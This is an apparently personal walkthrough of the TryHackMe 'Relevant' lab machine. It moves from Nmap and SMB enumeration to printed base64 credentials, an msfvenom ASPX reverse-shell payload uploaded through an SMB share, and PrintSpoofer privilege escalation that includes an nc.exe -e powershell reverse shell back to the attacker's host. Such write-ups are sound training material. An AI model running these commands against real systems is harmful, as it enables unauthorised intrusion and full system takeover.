Relevant is the eighth machine in the “Advanced Exploitation” part of TryHackMe’s “Offensive pentesting” path.
Nmap scan result:
nmap -sC -sV -o nmap.txt <target_ip> Starting Nmap 7.80 ( https://nmap.org ) at 2020-10-20 08:30 EDT Nmap scan report for <target_ip> Host is up (0.068s latency). Not shown: 995 filtered ports PORT STATE SERVICE VERSION 80/tcp open http Microsoft IIS httpd 10.0 | http-methods: |_ Potentially risky methods: TRACE |_http-server-header: Microsoft-IIS/10.0 |_http-title: IIS Windows Server 135/tcp open msrpc Microsoft Windows RPC 139/tcp open netbios-ssn Microsoft Windows netbios-ssn 445/tcp open microsoft-ds Windows Server 2016 Standard Evaluation 14393 microsoft-ds 3389/tcp open ms-wbt-server Microsoft Terminal Services | rdp-ntlm-info: | Target_Name: RELEVANT | NetBIOS_Domain_Name: RELEVANT | NetBIOS_Computer_Name: RELEVANT | DNS_Domain_Name: Relevant | DNS_Computer_Name: Relevant | Product_Version: 10.0.14393 |_ System_Time: 2020-10-20T12:30:47+00:00 | ssl-cert: Subject: commonName=Relevant | Not valid before: 2020-07-24T23:16:08 |_Not valid after: 2021-01-23T23:16:08 |_ssl-date: 2020-10-20T12:31:27+00:00; 0s from scanner time. Service Info: OSs: Windows, Windows Server 2008 R2 - 2012; CPE: cpe:/o:microsoft:windows Host script results: |_clock-skew: mean: 1h24m00s, deviation: 3h07m51s, median: 0s | smb-os-discovery: | OS: Windows Server 2016 Standard Evaluation 14393 (Windows Server 2016 Standard Evaluation 6.3) | Computer name: Relevant | NetBIOS computer name: RELEVANT\x00 | Workgroup: WORKGROUP\x00 |_ System time: 2020-10-20T05:30:49-07:00 | smb-security-mode: | account_used: guest | authentication_level: user | challenge_response: supported |_ message_signing: disabled (dangerous, but default) | smb2-security-mode: | 2.02: |_ Message signing enabled but not required | smb2-time: | date: 2020-10-20T12:30:48 |_ start_date: 2020-10-20T11:32:19 Service detection performed. Please report any incorrect results at https://nmap.org/submit/ . Nmap done: 1 IP address (1 host up) scanned in 57.43 seconds
This time we are working with
Windows Server 2016 and a bunch of ports are open.
Usually, I’m starting with port
80, but didn’t find any use for that this time.
The machine itself is not so stable, so I had to revert it after doing the
nmap scan to make it work again.
smbclient -L <target_ip> Enter WORKGROUP\kali's password: Sharename Type Comment --------- ---- ------- ADMIN$ Disk Remote Admin C$ Disk Default share IPC$ IPC Remote IPC nt4wrksv Disk SMB1 disabled -- no workgroup available
nt4wrksv looks interesting, let’s access it.
smbclient \\\\<target_ip>\\nt4wrksv Enter WORKGROUP\kali's password: Try "help" to get a list of possible commands. smb: \> dir . D 0 Sat Jul 25 17:46:04 2020 .. D 0 Sat Jul 25 17:46:04 2020 passwords.txt A 98 Sat Jul 25 11:15:33 2020 7735807 blocks of size 4096. 4951106 blocks available
passwords.txt contains two pair of credentials encoded in
The fasted way to decode them is
echo <hash> | base64 --decode
And again, I didn’t find any direct way of using that.
That’s it, a dead end. I don’t know what else to try. Everything looks like rabbit holes.
That might be frustrating. The feeling of you is THAT close to getting the shell is real.
If you will ask any OSCP student/holder what to do in this case they for sure will respond with
TRY HARDER (usually all caps, yeah).
I discussion on what that means to
try harder can long for hours, so let me just drop this article here:
Try Harder: From Mantra to Mindset
Take a deep breath, look around the pieces of evidence that you have.
- two pairs of credentials
- up to date services
- access to the
smbwhere you can’t do much
A common scenario is that you creating a shell and upload it to the
smb share. Normally, in such scenarios, the
smb share is connected to the web-server and it’s a
A quick check on that is try to open in the browser the
passwords.txt as we know the exact location of it:
What if we missed something during the enumeration part?
Let’s do another
nmap scan but with the
-p flag this time:
49663/tcp open http Microsoft IIS httpd 10.0 | http-methods: |_ Potentially risky methods: TRACE |_http-server-header: Microsoft-IIS/10.0 |_http-title: IIS Windows Server 49666/tcp open msrpc Microsoft Windows RPC 49668/tcp open msrpc Microsoft Windows RPC Service Info: OSs: Windows, Windows Server 2008 R2 - 2012; CPE: cpe:/o:microsoft:windows
Aha! Now we also have the port
49663 which is also running the
The content of if is the same as for port
80, but it doesn’t mean that they are the same.
Let’s try the check that we did for port
80 but this time for
There you have it, the content of
passwords.txt in a browser:
[User Passwords - Encoded] Qm9iIC0gIVBAJCRXMHJEITEyMw== QmlsbCAtIEp1dzRubmFNNG40MjA2OTY5NjkhJCQk
Now we can try out a scenario where we creating a reverse shell, uploading it to the
smb, and triggering it with the browser/
msfvenom -p windows/x64/shell_reverse_tcp -a x64 -f aspx -o shell.aspx LHOST=<your_ip> LPORT=<your_port>
Upload it to the
smb share with
put command, open the
You can trigger the shell by opening the following URL in the browser:
Catch the shell in
Let’s check the privileges that our current user has:
c:\inetpub\wwwroot\nt4wrksv>whoami /priv whoami /priv PRIVILEGES INFORMATION ---------------------- Privilege Name Description State ============================= ========================================= ======== SeAssignPrimaryTokenPrivilege Replace a process level token Disabled SeIncreaseQuotaPrivilege Adjust memory quotas for a process Disabled SeAuditPrivilege Generate security audits Disabled SeChangeNotifyPrivilege Bypass traverse checking Enabled SeImpersonatePrivilege Impersonate a client after authentication Enabled SeCreateGlobalPrivilege Create global objects Enabled SeIncreaseWorkingSetPrivilege Increase a process working set Disabled
SeImpersonatePrivilege is enabled!
Normally, I would try to use JuicyPotato, but this exploit is not very stable either.
I also could try the
incognito.exe that I used for the exploitation of Alfred, but I started this series to expand my knowledge and try out new tools and techniques.
I’ve heard a lot of quite a recent tool - PrintSpoofer, it’s a great opportunity to try it out!
As we have access to the
smb share, you can download the
x64 version of the latest
PrintSpoofer and upload it there.
You can find uploaded file here:
The tool is very easy to use:
c:\inetpub\wwwroot\nt4wrksv> PrintSpoofer.exe -i -c powershell
You can also create a reverse shell with it:
c:\inetpub\wwwroot\nt4wrksv> PrintSpoofer.exe -c "c:\inetpub\wwwroot\nt4wrksv\nc.exe <your_ip> <your_port> -e powershell"
- TRY HARDER
- TRY HARDER
- TRY HARDER
Do you likes this content?
You can follow me on Twitter to not miss new posts!